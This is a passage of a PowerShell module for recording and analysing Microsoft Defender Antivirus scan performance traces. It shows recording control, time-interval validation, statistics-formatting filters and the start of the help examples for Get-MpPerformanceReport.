unsupported version of '$wprCommand'. Please download and install Windows ADK:`r`nhttps://docs.microsoft.com/en-us/windows-hardware/get-started/adk-install`r`nand try again." $category = [System.Management.Automation.ErrorCategory]::NotInstalled $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'NotSupported',$category,$wprCommand $psCmdlet.WriteError($errRecord) return } function CancelPerformanceRecording { Write-Host "`n`nCancelling Microsoft Defender Antivirus performance recording... " -NoNewline & $wprCommand -cancel -instancename MSFT_MpPerformanceRecording $wprCommandExitCode = $LASTEXITCODE switch ($wprCommandExitCode) { 0 {} 0xc5583000 { Write-Error "Cannot cancel performance recording because currently Windows Performance Recorder is not recording." return } default { Write-Error ("Cannot cancel performance recording: 0x{0:x08}." -f $wprCommandExitCode) return } } Write-Host "ok.`n`nRecording has been cancelled." } # # Ensure Ctrl-C doesn't abort the app without cleanup # # - local PowerShell consoles: use [Console]::TreatControlCAsInput; cleanup performed and output preserved # - PowerShell ISE: use try { ... } catch { throw } finally; cleanup performed and output preserved # - remote PowerShell: use try { ... } catch { throw } finally; cleanup performed but output truncated [bool]$canTreatControlCAsInput = $interactiveMode -and ($Host.Name -eq $powerShellHostConsole) $savedControlCAsInput = $null $shouldCancelRecordingOnTerminatingError = $false try { if ($canTreatControlCAsInput) { $savedControlCAsInput = [Console]::TreatControlCAsInput [Console]::TreatControlCAsInput = $true } # # Start recording # Write-Host "Starting Microsoft Defender Antivirus performance recording... " -NoNewline $shouldCancelRecordingOnTerminatingError = $true & $wprCommand -start "$wprProfile!Scans.Light" -filemode -instancename MSFT_MpPerformanceRecording $wprCommandExitCode = $LASTEXITCODE switch ($wprCommandExitCode) { 0 {} 0xc5583001 { $shouldCancelRecordingOnTerminatingError = $false Write-Error "Cannot start performance recording because Windows Performance Recorder is already recording." return } default { $shouldCancelRecordingOnTerminatingError = $false Write-Error ("Cannot start performance recording: 0x{0:x08}." -f $wprCommandExitCode) return } } Write-Host "ok.`n`nRecording has started." -NoNewline if ($timedMode) { Write-Host "`n`n Recording for $Seconds seconds... " -NoNewline Start-Sleep -Seconds:$Seconds Write-Host "ok." -NoNewline } elseif ($interactiveMode) { $stopPrompt = "`n`n=> Reproduce the scenario that is impacting the performance on your device.`n`n Press <ENTER> to stop and save recording or <Ctrl-C> to cancel recording" if ($canTreatControlCAsInput) { Write-Host "${stopPrompt}: " do { $key = [Console]::ReadKey($true) if (($key.Modifiers -eq [ConsoleModifiers]::Control) -and (($key.Key -eq [ConsoleKey]::C))) { CancelPerformanceRecording $shouldCancelRecordingOnTerminatingError = $false # # Restore Ctrl-C behavior # [Console]::TreatControlCAsInput = $savedControlCAsInput return } } while (($key.Modifiers -band ([ConsoleModifiers]::Alt -bor [ConsoleModifiers]::Control -bor [ConsoleModifiers]::Shift)) -or ($key.Key -ne [ConsoleKey]::Enter)) } else { Read-Host -Prompt:$stopPrompt } } # # Stop recording # Write-Host "`n`nStopping Microsoft Defender Antivirus performance recording... " & $wprCommand -stop $RecordTo -instancename MSFT_MpPerformanceRecording $wprCommandExitCode = $LASTEXITCODE switch ($wprCommandExitCode) { 0 { $shouldCancelRecordingOnTerminatingError = $false } 0xc5583000 { $shouldCancelRecordingOnTerminatingError = $false Write-Error "Cannot stop performance recording because Windows Performance Recorder is not recording a trace." return } default { Write-Error ("Cannot stop performance recording: 0x{0:x08}." -f $wprCommandExitCode) return } } Write-Host "ok.`n`nRecording has been saved to '$RecordTo'." Write-Host ` ' The performance analyzer provides insight into problematic files that could cause performance degradation of Microsoft Defender Antivirus. This tool is provided "AS IS", and is not intended to provide suggestions on exclusions. Exclusions can reduce the level of protection on your endpoints. Exclusions, if any, should be defined with caution. ' Write-Host ` ' The trace you have just captured may contain personally identifiable information, including but not necessarily limited to paths to files accessed, paths to registry accessed and process names. Exact information depends on the events that were logged. Please be aware of this when sharing this trace with other people. ' } catch { throw } finally { if ($shouldCancelRecordingOnTerminatingError) { CancelPerformanceRecording } if ($null -ne $savedControlCAsInput) { # # Restore Ctrl-C behavior # [Console]::TreatControlCAsInput = $savedControlCAsInput } } } function PadUserDateTime { [OutputType([DateTime])] param( [Parameter(Mandatory = $true, Position = 0)] [DateTime]$UserDateTime ) # Padding user input to include all events up to the start of the next second. if (($UserDateTime.Ticks % 10000000) -eq 0) { return $UserDateTime.AddTicks(9999999) } else { return $UserDateTime } } function ValidateTimeInterval { [OutputType([PSCustomObject])] param( [DateTime]$MinStartTime = [DateTime]::MinValue, [DateTime]$MinEndTime = [DateTime]::MinValue, [DateTime]$MaxStartTime = [DateTime]::MaxValue, [DateTime]$MaxEndTime = [DateTime]::MaxValue ) $ret = [PSCustomObject]@{ arguments = [string[]]@() status = $false } if ($MinStartTime -gt $MaxEndTime) { $ex = New-Object System.Management.Automation.ValidationMetadataException "MinStartTime '$MinStartTime' should have been lower than MaxEndTime '$MaxEndTime'" $category = [System.Management.Automation.ErrorCategory]::InvalidArgument $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'Invalid time interval',$category,"'$MinStartTime' .. '$MaxEndTime'" $psCmdlet.WriteError($errRecord) return $ret } if ($MinStartTime -gt $MaxStartTime) { $ex = New-Object System.Management.Automation.ValidationMetadataException "MinStartTime '$MinStartTime' should have been lower than MaxStartTime '$MaxStartTime'" $category = [System.Management.Automation.ErrorCategory]::InvalidArgument $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'Invalid time interval',$category,"'$MinStartTime' .. '$MaxStartTime'" $psCmdlet.WriteError($errRecord) return $ret } if ($MinEndTime -gt $MaxEndTime) { $ex = New-Object System.Management.Automation.ValidationMetadataException "MinEndTime '$MinEndTime' should have been lower than MaxEndTime '$MaxEndTime'" $category = [System.Management.Automation.ErrorCategory]::InvalidArgument $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'Invalid time interval',$category,"'$MinEndTime' .. '$MaxEndTime'" $psCmdlet.WriteError($errRecord) return $ret } if ($MinStartTime -gt [DateTime]::MinValue) { try { $MinStartFileTime = $MinStartTime.ToFileTime() } catch { $ex = New-Object System.Management.Automation.ValidationMetadataException "MinStartTime '$MinStartTime' is not a valid timestamp." $category = [System.Management.Automation.ErrorCategory]::InvalidArgument $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'Value has to be a local DateTime between "January 1, 1601 12:00:00 AM UTC" and "December 31, 9999 11:59:59 PM UTC"',$category,"'$MinStartTime'" $psCmdlet.WriteError($errRecord) return $ret } $ret.arguments += @('-MinStartTime', $MinStartFileTime) } if ($MaxEndTime -lt [DateTime]::MaxValue) { try { $MaxEndFileTime = $MaxEndTime.ToFileTime() } catch { $ex = New-Object System.Management.Automation.ValidationMetadataException "MaxEndTime '$MaxEndTime' is not a valid timestamp." $category = [System.Management.Automation.ErrorCategory]::InvalidArgument $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'Value has to be a local DateTime between "January 1, 1601 12:00:00 AM UTC" and "December 31, 9999 11:59:59 PM UTC"',$category,"'$MaxEndTime'" $psCmdlet.WriteError($errRecord) return $ret } $ret.arguments += @('-MaxEndTime', $MaxEndFileTime) } if ($MaxStartTime -lt [DateTime]::MaxValue) { try { $MaxStartFileTime = $MaxStartTime.ToFileTime() } catch { $ex = New-Object System.Management.Automation.ValidationMetadataException "MaxStartTime '$MaxStartTime' is not a valid timestamp." $category = [System.Management.Automation.ErrorCategory]::InvalidArgument $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'Value has to be a local DateTime between "January 1, 1601 12:00:00 AM UTC" and "December 31, 9999 11:59:59 PM UTC"',$category,"'$MaxStartTime'" $psCmdlet.WriteError($errRecord) return $ret } $ret.arguments += @('-MaxStartTime', $MaxStartFileTime) } if ($MinEndTime -gt [DateTime]::MinValue) { try { $MinEndFileTime = $MinEndTime.ToFileTime() } catch { $ex = New-Object System.Management.Automation.ValidationMetadataException "MinEndTime '$MinEndTime' is not a valid timestamp." $category = [System.Management.Automation.ErrorCategory]::InvalidArgument $errRecord = New-Object System.Management.Automation.ErrorRecord $ex,'Value has to be a local DateTime between "January 1, 1601 12:00:00 AM UTC" and "December 31, 9999 11:59:59 PM UTC"',$category,"'$MinEndTime'" $psCmdlet.WriteError($errRecord) return $ret } $ret.arguments += @('-MinEndTime', $MinEndFileTime) } $ret.status = $true return $ret } function ParseFriendlyDuration { [OutputType([TimeSpan])] param( [Parameter(Mandatory = $true, Position = 0)] [string] $FriendlyDuration ) if ($FriendlyDuration -match '^(\d+)(?:\.(\d+))?(sec|ms|us)$') { [string]$seconds = $Matches[1] [string]$decimals = $Matches[2] [string]$unit = $Matches[3] [uint32]$magnitude = switch ($unit) { 'sec' {7} 'ms' {4} 'us' {1} } if ($decimals.Length -gt $magnitude) { throw [System.ArgumentException]::new("String '$FriendlyDuration' was not recognized as a valid Duration: $($decimals.Length) decimals specified for time unit '$unit'; at most $magnitude expected.") } return [timespan]::FromTicks([int64]::Parse($seconds + $decimals.PadRight($magnitude, '0'))) } [timespan]$result = [timespan]::FromTicks(0) if ([timespan]::TryParse($FriendlyDuration, [ref]$result)) { return $result } throw [System.ArgumentException]::new("String '$FriendlyDuration' was not recognized as a valid Duration; expected a value like '0.1234567sec' or '0.1234ms' or '0.1us' or a valid TimeSpan.") } [scriptblock]$FriendlyTimeSpanToString = { '{0:0.0000}ms' -f ($this.Ticks / 10000.0) } function New-FriendlyTimeSpan { param( [Parameter(Mandatory = $true)] [uint64]$Ticks, [bool]$Raw = $false ) if ($Raw) { return $Ticks } $result = [TimeSpan]::FromTicks($Ticks) $result.PsTypeNames.Insert(0, 'MpPerformanceReport.TimeSpan') $result | Add-Member -Force -MemberType:ScriptMethod -Name:'ToString' -Value:$FriendlyTimeSpanToString $result } function New-FriendlyDateTime { param( [Parameter(Mandatory = $true)] [uint64]$FileTime, [bool]$Raw = $false ) if ($Raw) { return $FileTime } [DateTime]::FromFileTime($FileTime) } function Add-DefenderCollectionType { param( [Parameter(Mandatory = $true)] [ref]$CollectionRef ) if ($CollectionRef.Value.Length -and ($CollectionRef.Value | Get-Member -Name:'Processes','Files','Extensions','Scans','Folder')) { $CollectionRef.Value.PSTypeNames.Insert(0, 'MpPerformanceReport.NestedCollection') } } [scriptblock]$FriendlyScanInfoToString = { [PSCustomObject]@{ ScanType = $this.ScanType StartTime = $this.StartTime EndTime = $this.EndTime Duration = $this.Duration Reason = $this.Reason Path = $this.Path ProcessPath = $this.ProcessPath ProcessId = $this.ProcessId Image = $this.Image } } function Get-ScanComments { param( [PSCustomObject[]]$SecondaryEvents, [bool]$Raw = $false ) $Comments = @() foreach ($item in @($SecondaryEvents | Sort-Object -Property:StartTime)) { if (($item | Get-Member -Name:'Message' -MemberType:NoteProperty).Count -eq 1) { if (($item | Get-Member -Name:'Duration' -MemberType:NoteProperty).Count -eq 1) { $Duration = New-FriendlyTimeSpan -Ticks:$item.Duration -Raw:$Raw $StartTime = New-FriendlyDateTime -FileTime:$item.StartTime -Raw:$Raw $Comments += "Expensive operation `"{0}`" started at {1} lasted {2}" -f ($item.Message, $StartTime, $Duration.ToString()) if (($item | Get-Member -Name:'Debug' -MemberType:NoteProperty).Count -eq 1) { $item.Debug | ForEach-Object { if ($_.EndsWith("is NOT trusted") -or $_.StartsWith("Not trusted, ") -or $_.ToLower().Contains("error") -or $_.Contains("Result of ValidateTrust")) { $Comments += "$_" } } } } else { if ($item.Message.Contains("subtype=Lowfi")) { $Comments += $item.Message.Replace("subtype=Lowfi", "Low-fidelity detection") } else { $Comments += $item.Message } } } elseif (($item | Get-Member -Name:'ScanType' -MemberType:NoteProperty).Count -eq 1) { $Duration = New-FriendlyTimeSpan -Ticks:$item.Duration -Raw:$Raw $OpId = "Internal opertion" if (($item | Get-Member -Name:'Path' -MemberType:NoteProperty).Count -eq 1) { $OpId = $item.Path } elseif (($item | Get-Member -Name:'ProcessPath' -MemberType:NoteProperty).Count -eq 1) { $OpId = $item.ProcessPath } $Comments += "{0} {1} lasted {2}" -f ($item.ScanType, $OpId, $Duration.ToString()) } } $Comments } filter ConvertTo-DefenderScanInfo { param( [bool]$Raw = $false ) $result = [PSCustomObject]@{ ScanType = [string]$_.ScanType StartTime = New-FriendlyDateTime -FileTime:$_.StartTime -Raw:$Raw EndTime = New-FriendlyDateTime -FileTime:$_.EndTime -Raw:$Raw Duration = New-FriendlyTimeSpan -Ticks:$_.Duration -Raw:$Raw Reason = [string]$_.Reason SkipReason = [string]$_.SkipReason } if (($_ | Get-Member -Name:'Path' -MemberType:NoteProperty).Count -eq 1) { $result | Add-Member -NotePropertyName:'Path' -NotePropertyValue:([string]$_.Path) } if (($_ | Get-Member -Name:'ProcessPath' -MemberType:NoteProperty).Count -eq 1) { $result | Add-Member -NotePropertyName:'ProcessPath' -NotePropertyValue:([string]$_.ProcessPath) } if (($_ | Get-Member -Name:'Image' -MemberType:NoteProperty).Count -eq 1) { $result | Add-Member -NotePropertyName:'Image' -NotePropertyValue:([string]$_.Image) } elseif ($_.ProcessPath -and (-not $_.ProcessPath.StartsWith("pid"))) { try { $result | Add-Member -NotePropertyName:'Image' -NotePropertyValue:([string]([System.IO.FileInfo]$_.ProcessPath).Name) } catch { # Silently ignore. } } $ProcessId = if ($_.ProcessId -gt 0) { [int]$_.ProcessId } elseif ($_.ScannedProcessId -gt 0) { [int]$_.ScannedProcessId } else { $null } if ($ProcessId) { $result | Add-Member -NotePropertyName:'ProcessId' -NotePropertyValue:([int]$ProcessId) } if ($result.Image -and $result.ProcessId) { $ProcessName = "{0} ({1})" -f $result.Image, $result.ProcessId $result | Add-Member -NotePropertyName:'ProcessName' -NotePropertyValue:([string]$ProcessName) } if ((($_ | Get-Member -Name:'Extra' -MemberType:NoteProperty).Count -eq 1) -and ($_.Extra.Count -gt 0)) { $Comments = @(Get-ScanComments -SecondaryEvents:$_.Extra -Raw:$Raw) $result | Add-Member -NotePropertyName:'Comments' -NotePropertyValue:$Comments } if (-not $Raw) { $result.PSTypeNames.Insert(0, 'MpPerformanceReport.ScanInfo') } $result | Add-Member -Force -MemberType:ScriptMethod -Name:'ToString' -Value:$FriendlyScanInfoToString $result } filter ConvertTo-DefenderScanOverview { param( [bool]$Raw = $false ) $vals = [ordered]@{} foreach ($entry in $_.PSObject.Properties) { if ($entry.Value) { $Key = $entry.Name.Replace("_", " ") if ($Key.EndsWith("Time")) { $vals[$Key] = New-FriendlyDateTime -FileTime:$entry.Value -Raw:$Raw } elseif ($Key.EndsWith("Duration")) { $vals[$Key] = New-FriendlyTimeSpan -Ticks:$entry.Value -Raw:$Raw } else { $vals[$Key] = $entry.Value } } } # Remove duplicates if (($_ | Get-Member -Name:'PerfHints' -MemberType:NoteProperty).Count -eq 1) { $hints = [ordered]@{} foreach ($hint in $_.PerfHints) { $hints[$hint] = $true } $vals["PerfHints"] = @($hints.Keys) } $result = New-Object PSCustomObject -Property:$vals $result } filter ConvertTo-DefenderScanStats { param( [bool]$Raw = $false ) $result = [PSCustomObject]@{ Count = $_.Count TotalDuration = New-FriendlyTimeSpan -Ticks:$_.TotalDuration -Raw:$Raw MinDuration = New-FriendlyTimeSpan -Ticks:$_.MinDuration -Raw:$Raw AverageDuration = New-FriendlyTimeSpan -Ticks:$_.AverageDuration -Raw:$Raw MaxDuration = New-FriendlyTimeSpan -Ticks:$_.MaxDuration -Raw:$Raw MedianDuration = New-FriendlyTimeSpan -Ticks:$_.MedianDuration -Raw:$Raw } if (-not $Raw) { $result.PSTypeNames.Insert(0, 'MpPerformanceReport.ScanStats') } $result } [scriptblock]$FriendlyScannedFilePathStatsToString = { [PSCustomObject]@{ Count = $this.Count TotalDuration = $this.TotalDuration MinDuration = $this.MinDuration AverageDuration = $this.AverageDuration MaxDuration = $this.MaxDuration MedianDuration = $this.MedianDuration Path = $this.Path } } filter ConvertTo-DefenderScannedFilePathStats { param( [bool]$Raw = $false ) $result = $_ | ConvertTo-DefenderScanStats -Raw:$Raw if (-not $Raw) { $result.PSTypeNames.Insert(0, 'MpPerformanceReport.ScannedFilePathStats') } $result | Add-Member -NotePropertyName:'Path' -NotePropertyValue:($_.Path) $result | Add-Member -Force -MemberType:ScriptMethod -Name:'ToString' -Value:$FriendlyScannedFilePathStatsToString if ($null -ne $_.Scans) { $result | Add-Member -NotePropertyName:'Scans' -NotePropertyValue:@( $_.Scans | ConvertTo-DefenderScanInfo -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Scans) } } if ($null -ne $_.Processes) { $result | Add-Member -NotePropertyName:'Processes' -NotePropertyValue:@( $_.Processes | ConvertTo-DefenderScannedProcessStats -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Processes) } } $result } [scriptblock]$FriendlyScannedPathsStatsToString = { [PSCustomObject]@{ Count = $this.Count TotalDuration = $this.TotalDuration MinDuration = $this.MinDuration AverageDuration = $this.AverageDuration MaxDuration = $this.MaxDuration MedianDuration = $this.MedianDuration Path = $this.Path Folder = $this.Folder } } filter ConvertTo-DefenderScannedPathsStats { param( [bool]$Raw = $false ) $result = $_ | ConvertTo-DefenderScanStats -Raw:$Raw if (-not $Raw) { $result.PSTypeNames.Insert(0, 'MpPerformanceReport.ScannedPathStats') } $result | Add-Member -NotePropertyName:'Path' -NotePropertyValue:($_.Path) if ($null -ne $_.Folder) { $result | Add-Member -NotePropertyName:'Folder' -NotePropertyValue:@( $_.Folder | ConvertTo-DefenderScannedPathsStats -Raw:$Raw ) $result | Add-Member -Force -MemberType:ScriptMethod -Name:'ToString' -Value:$FriendlyScannedPathsStatsToString if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Folder) } } if ($null -ne $_.Files) { $result | Add-Member -NotePropertyName:'Files' -NotePropertyValue:@( $_.Files | ConvertTo-DefenderScannedFilePathStats -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Files) } } if ($null -ne $_.Scans) { $result | Add-Member -NotePropertyName:'Scans' -NotePropertyValue:@( $_.Scans | ConvertTo-DefenderScanInfo -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Scans) } } if ($null -ne $_.Processes) { $result | Add-Member -NotePropertyName:'Processes' -NotePropertyValue:@( $_.Processes | ConvertTo-DefenderScannedProcessStats -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Processes) } } $result } [scriptblock]$FriendlyScannedFileExtensionStatsToString = { [PSCustomObject]@{ Count = $this.Count TotalDuration = $this.TotalDuration MinDuration = $this.MinDuration AverageDuration = $this.AverageDuration MaxDuration = $this.MaxDuration MedianDuration = $this.MedianDuration Extension = $this.Extension } } filter ConvertTo-DefenderScannedFileExtensionStats { param( [bool]$Raw = $false ) $result = $_ | ConvertTo-DefenderScanStats -Raw:$Raw if (-not $Raw) { $result.PSTypeNames.Insert(0, 'MpPerformanceReport.ScannedFileExtensionStats') } $result | Add-Member -NotePropertyName:'Extension' -NotePropertyValue:($_.Extension) $result | Add-Member -Force -MemberType:ScriptMethod -Name:'ToString' -Value:$FriendlyScannedFileExtensionStatsToString if ($null -ne $_.Scans) { $result | Add-Member -NotePropertyName:'Scans' -NotePropertyValue:@( $_.Scans | ConvertTo-DefenderScanInfo -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Scans) } } if ($null -ne $_.Files) { $result | Add-Member -NotePropertyName:'Files' -NotePropertyValue:@( $_.Files | ConvertTo-DefenderScannedFilePathStats -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Files) } } if ($null -ne $_.Processes) { $result | Add-Member -NotePropertyName:'Processes' -NotePropertyValue:@( $_.Processes | ConvertTo-DefenderScannedProcessStats -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Processes) } } if ($null -ne $_.Folder) { $result | Add-Member -NotePropertyName:'Folder' -NotePropertyValue:@( $_.Folder | ConvertTo-DefenderScannedPathsStats -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Folder) } } $result } [scriptblock]$FriendlyScannedProcessStatsToString = { [PSCustomObject]@{ Count = $this.Count TotalDuration = $this.TotalDuration MinDuration = $this.MinDuration AverageDuration = $this.AverageDuration MaxDuration = $this.MaxDuration MedianDuration = $this.MedianDuration ProcessPath = $this.ProcessPath } } filter ConvertTo-DefenderScannedProcessStats { param( [bool]$Raw ) $result = $_ | ConvertTo-DefenderScanStats -Raw:$Raw if (-not $Raw) { $result.PSTypeNames.Insert(0, 'MpPerformanceReport.ScannedProcessStats') } $result | Add-Member -NotePropertyName:'ProcessPath' -NotePropertyValue:($_.Process) $result | Add-Member -Force -MemberType:ScriptMethod -Name:'ToString' -Value:$FriendlyScannedProcessStatsToString if ($null -ne $_.Scans) { $result | Add-Member -NotePropertyName:'Scans' -NotePropertyValue:@( $_.Scans | ConvertTo-DefenderScanInfo -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Scans) } } if ($null -ne $_.Files) { $result | Add-Member -NotePropertyName:'Files' -NotePropertyValue:@( $_.Files | ConvertTo-DefenderScannedFilePathStats -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Files) } } if ($null -ne $_.Extensions) { $result | Add-Member -NotePropertyName:'Extensions' -NotePropertyValue:@( $_.Extensions | ConvertTo-DefenderScannedFileExtensionStats -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Extensions) } } if ($null -ne $_.Folder) { $result | Add-Member -NotePropertyName:'Folder' -NotePropertyValue:@( $_.Folder | ConvertTo-DefenderScannedPathsStats -Raw:$Raw ) if (-not $Raw) { Add-DefenderCollectionType -CollectionRef:([ref]$result.Folder) } } $result } <# .SYNOPSIS This cmdlet reports the file paths, file extensions, and processes that cause the highest impact to Microsoft Defender Antivirus scans. .DESCRIPTION This cmdlet analyzes a previously collected Microsoft Defender Antivirus performance recording and reports the file paths, file extensions and processes that cause the highest impact to Microsoft Defender Antivirus scans. The performance analyzer provides insight into problematic files that could cause performance degradation of Microsoft Defender Antivirus. This tool is provided "AS IS", and is not intended to provide suggestions on exclusions. Exclusions can reduce the level of protection on your endpoints. Exclusions, if any, should be defined with caution. .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopFiles:10 -TopExtensions:10 -TopProcesses:10 -TopScans:10 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopFiles:10 -TopExtensions:10 -TopProcesses:10 -TopScans:10 -Raw | ConvertTo-Json .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopFiles:10 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopFiles:10 -TopScansPerFile:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopFiles:10 -TopProcessesPerFile:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopFiles:10 -TopProcessesPerFile:3 -TopScansPerProcessPerFile:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopPathsDepth:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopPathsDepth:3 -TopScansPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopScansPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopPathsDepth:3 -TopFilesPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopFilesPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopPathsDepth:3 -TopFilesPerPath:3 -TopScansPerFilePerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopFilesPerPath:3 -TopScansPerFilePerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopPathsDepth:3 -TopExtensionsPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopExtensionsPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopPathsDepth:3 -TopExtensionsPerPath:3 -TopScansPerExtensionPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopExtensionsPerPath:3 -TopScansPerExtensionPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopPathsDepth:3 -TopProcessesPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopProcessesPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopPathsDepth:3 -TopProcessesPerPath:3 -TopScansPerProcessPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopPaths:10 -TopProcessesPerPath:3 -TopScansPerProcessPerPath:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopExtensions:10 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopExtensions:10 -TopScansPerExtension:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopExtensions:10 -TopPathsPerExtension:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopExtensions:10 -TopPathsPerExtension:3 -TopPathsDepth:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopExtensions:10 -TopPathsPerExtension:3 -TopPathsDepth:3 -TopScansPerPathPerExtension:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopExtensions:10 -TopPathsPerExtension:3 -TopScansPerPathPerExtension:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopExtensions:10 -TopFilesPerExtension:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopExtensions:10 -TopFilesPerExtension:3 -TopScansPerFilePerExtension:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopExtensions:10 -TopProcessesPerExtension:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopExtensions:10 -TopProcessesPerExtension:3 -TopScansPerProcessPerExtension:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopProcesses:10 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopProcesses:10 -TopScansPerProcess:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopProcesses:10 -TopExtensionsPerProcess:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopProcesses:10 -TopExtensionsPerProcess:3 -TopScansPerExtensionPerProcess:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopProcesses:10 -TopFilesPerProcess:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopProcesses:10 -TopFilesPerProcess:3 -TopScansPerFilePerProcess:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopProcesses:10 -TopPathsPerProcess:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopProcesses:10 -TopPathsPerProcess:3 -TopPathsDepth:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopProcesses:10 -TopPathsPerProcess:3 -TopPathsDepth:3 -TopScansPerPathPerProcess:3 .EXAMPLE Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopProcesses:10 -TopPathsPerProcess:3 -TopScansPerPathPerProcess:3 .EXAMPLE # Find top 10 scans with longest durations that both start and end between MinStartTime and MaxEndTime: Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MinStartTime:"5/14/2022 7:01:11 AM" -MaxEndTime:"5/14/2022 7:01:41 AM" .EXAMPLE # Find top 10 scans with longest durations between MinEndTime and MaxStartTime, possibly partially overlapping this period Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MinEndTime:"5/14/2022 7:01:11 AM" -MaxStartTime:"5/14/2022 7:01:41 AM" .EXAMPLE # Find top 10 scans with longest durations between MinStartTime and MaxStartTime, possibly partially overlapping this period Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MinStartTime:"5/14/2022 7:01:11 AM" -MaxStartTime:"5/14/2022 7:01:41 AM" .EXAMPLE # Find top 10 scans with longest durations that start at MinStartTime or later: Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MinStartTime:"5/14/2022 7:01:11 AM" .EXAMPLE # Find top 10 scans with longest durations that start before or at MaxStartTime: Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MaxStartTime:"5/14/2022 7:01:11 AM" .EXAMPLE # Find top 10 scans with longest durations that end at MinEndTime or later: Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MinEndTime:"5/14/2022 7:01:11 AM" .EXAMPLE # Find top 10 scans with longest durations that end before or at MaxEndTime: Get-MpPerformanceReport -Path:.\Defender-scans.etl -TopScans:10 -MaxEndTime:"5/14/2022 7:01:11 AM" .EXAMPLE # Find top 10 scans with longest durations, impacting the current interval, that did not start or end between MaxStartTime and MinEndTime. Get-MpPerformanceReport -Path:.\Defender-scans.etl 